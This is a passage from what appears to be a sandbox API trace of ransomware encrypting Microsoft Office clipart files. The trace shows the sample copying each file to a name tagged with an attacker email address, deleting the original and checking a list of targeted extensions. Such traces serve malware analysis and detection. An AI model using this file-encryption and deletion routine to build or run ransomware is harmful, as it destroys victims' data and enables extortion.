office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0056.390] GetLastError () returned 0x0 [0056.390] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x9d0e, lpOverlapped=0x0) returned 1 [0056.578] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x9d10, lpOverlapped=0x0) returned 1 [0056.580] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.583] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.583] SetEndOfFile (hFile=0x1c8) returned 1 [0056.583] CloseHandle (hObject=0x1c8) returned 1 [0056.584] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.584] SetEndOfFile (hFile=0x224) returned 1 [0056.585] CloseHandle (hObject=0x224) returned 1 [0056.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.585] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 1 [0056.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0056.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0056.586] lstrlenW (lpString=".doc") returned 4 [0056.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.586] lstrlenW (lpString=".docx") returned 5 [0056.586] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.586] lstrlenW (lpString=".pdf") returned 4 [0056.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.586] lstrlenW (lpString=".xls") returned 4 [0056.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.586] lstrlenW (lpString=".xlsx") returned 5 [0056.586] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.586] lstrlenW (lpString=".ppt") returned 4 [0056.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0056.586] lstrlenW (lpString=".zip") returned 4 [0056.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.586] lstrlenW (lpString=".rar") returned 4 [0056.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.587] lstrlenW (lpString=".bz2") returned 4 [0056.587] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.587] lstrlenW (lpString=".7z") returned 3 [0056.587] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0056.587] lstrlenW (lpString=".dbf") returned 4 [0056.587] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0056.587] lstrlenW (lpString=".1cd") returned 4 [0056.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0056.587] lstrlenW (lpString=".jpg") returned 4 [0056.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.637] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=12520) returned 1 [0057.637] CloseHandle (hObject=0x214) returned 1 [0057.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf")) returned 0x20 [0057.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0057.649] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.649] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0057.649] GetLastError () returned 0x0 [0057.649] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x30e8, lpOverlapped=0x0) returned 1 [0057.653] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x30f0, lpOverlapped=0x0) returned 1 [0057.654] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.654] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.654] SetEndOfFile (hFile=0x1c8) returned 1 [0057.655] CloseHandle (hObject=0x1c8) returned 1 [0057.655] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.655] SetEndOfFile (hFile=0x22c) returned 1 [0057.655] CloseHandle (hObject=0x22c) returned 1 [0057.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.656] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf")) returned 1 [0057.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.656] lstrlenW (lpString=".doc") returned 4 [0057.656] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.656] lstrlenW (lpString=".docx") returned 5 [0057.656] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.656] lstrlenW (lpString=".pdf") returned 4 [0057.656] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.656] lstrlenW (lpString=".xls") returned 4 [0057.656] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.656] lstrlenW (lpString=".xlsx") returned 5 [0057.656] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.656] lstrlenW (lpString=".ppt") returned 4 [0057.656] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.656] lstrlenW (lpString=".zip") returned 4 [0057.656] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.656] lstrlenW (lpString=".rar") returned 4 [0057.656] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.656] lstrlenW (lpString=".bz2") returned 4 [0057.656] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.656] lstrlenW (lpString=".7z") returned 3 [0057.657] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.657] lstrlenW (lpString=".dbf") returned 4 [0057.657] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.657] lstrlenW (lpString=".1cd") returned 4 [0057.657] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.657] lstrlenW (lpString=".jpg") returned 4 [0057.657] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.658] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=10146) returned 1 [0057.658] CloseHandle (hObject=0x22c) returned 1 [0057.658] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf")) returned 0x20 [0057.658] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0057.658] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.658] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0057.658] GetLastError () returned 0x0 [0057.658] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x27a2, lpOverlapped=0x0) returned 1 [0057.662] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x27b0, lpOverlapped=0x0) returned 1 [0057.663] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.663] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.663] SetEndOfFile (hFile=0x1c8) returned 1 [0057.663] CloseHandle (hObject=0x1c8) returned 1 [0057.663] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.663] SetEndOfFile (hFile=0x22c) returned 1 [0057.664] CloseHandle (hObject=0x22c) returned 1 [0057.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.664] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf")) returned 1 [0057.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0057.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0057.665] lstrlenW (lpString=".doc") returned 4 [0057.665] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.665] lstrlenW (lpString=".docx") returned 5 [0057.665] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.665] lstrlenW (lpString=".pdf") returned 4 [0057.665] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.665] lstrlenW (lpString=".xls") returned 4 [0057.665] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.665] lstrlenW (lpString=".xlsx") returned 5 [0057.665] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.665] lstrlenW (lpString=".ppt") returned 4 [0057.665] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0057.665] lstrlenW (lpString=".zip") returned 4 [0057.665] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.665] lstrlenW (lpString=".rar") returned 4 [0057.665] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.665] lstrlenW (lpString=".bz2") returned 4 [0057.665] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.665] lstrlenW (lpString=".7z") returned 3 [0057.665] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0057.665] lstrlenW (lpString=".dbf") returned 4 [0057.665] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0057.665] lstrlenW (lpString=".1cd") returned 4 [0057.665] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0057.665] lstrlenW (lpString=".jpg") returned 4 [0057.666] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.666] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1464) returned 1 [0057.666] CloseHandle (hObject=0x22c) returned 1 [0057.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf")) returned 0x20 [0057.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0057.666] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.666] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0057.675] GetLastError () returned 0x0 [0057.675] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x5b8, lpOverlapped=0x0) returned 1 [0057.677] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0057.677] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.678] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.678] SetEndOfFile (hFile=0x1c8) returned 1 [0057.678] CloseHandle (hObject=0x1c8) returned 1 [0057.678] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.678] SetEndOfFile (hFile=0x22c) returned 1 [0057.679] CloseHandle (hObject=0x22c) returned 1 [0057.679] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.679] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf")) returned 1 [0057.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0057.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0057.679] lstrlenW (lpString=".doc") returned 4 [0057.679] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.679] lstrlenW (lpString=".docx") returned 5 [0057.679] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.679] lstrlenW (lpString=".pdf") returned 4 [0057.679] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.679] lstrlenW (lpString=".xls") returned 4 [0057.679] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.679] lstrlenW (lpString=".xlsx") returned 5 [0057.679] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.679] lstrlenW (lpString=".ppt") returned 4 [0057.679] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0057.679] lstrlenW (lpString=".zip") returned 4 [0057.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.679] lstrlenW (lpString=".rar") returned 4 [0057.680] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.680] lstrlenW (lpString=".bz2") returned 4 [0057.680] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.680] lstrlenW (lpString=".7z") returned 3 [0057.680] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0057.680] lstrlenW (lpString=".dbf") returned 4 [0057.680] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0057.680] lstrlenW (lpString=".1cd") returned 4 [0057.680] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0057.680] lstrlenW (lpString=".jpg") returned 4 [0057.680] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.680] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1696) returned 1 [0057.680] CloseHandle (hObject=0x22c) returned 1 [0057.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf")) returned 0x20 [0057.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0057.680] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.681] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0057.681] GetLastError () returned 0x0 [0057.681] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x6a0, lpOverlapped=0x0) returned 1 [0057.682] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x6b0, lpOverlapped=0x0) returned 1 [0057.683] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.683] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.683] SetEndOfFile (hFile=0x1c8) returned 1 [0057.683] CloseHandle (hObject=0x1c8) returned 1 [0057.683] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.683] SetEndOfFile (hFile=0x22c) returned 1 [0057.684] CloseHandle (hObject=0x22c) returned 1 [0057.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf")) returned 1 [0057.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0057.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0057.684] lstrlenW (lpString=".doc") returned 4 [0057.685] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.685] lstrlenW (lpString=".docx") returned 5 [0057.685] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.685] lstrlenW (lpString=".pdf") returned 4 [0057.685] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.685] lstrlenW (lpString=".xls") returned 4 [0057.685] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.685] lstrlenW (lpString=".xlsx") returned 5 [0057.685] lstrcmpiW (lpString1=".xlsx", 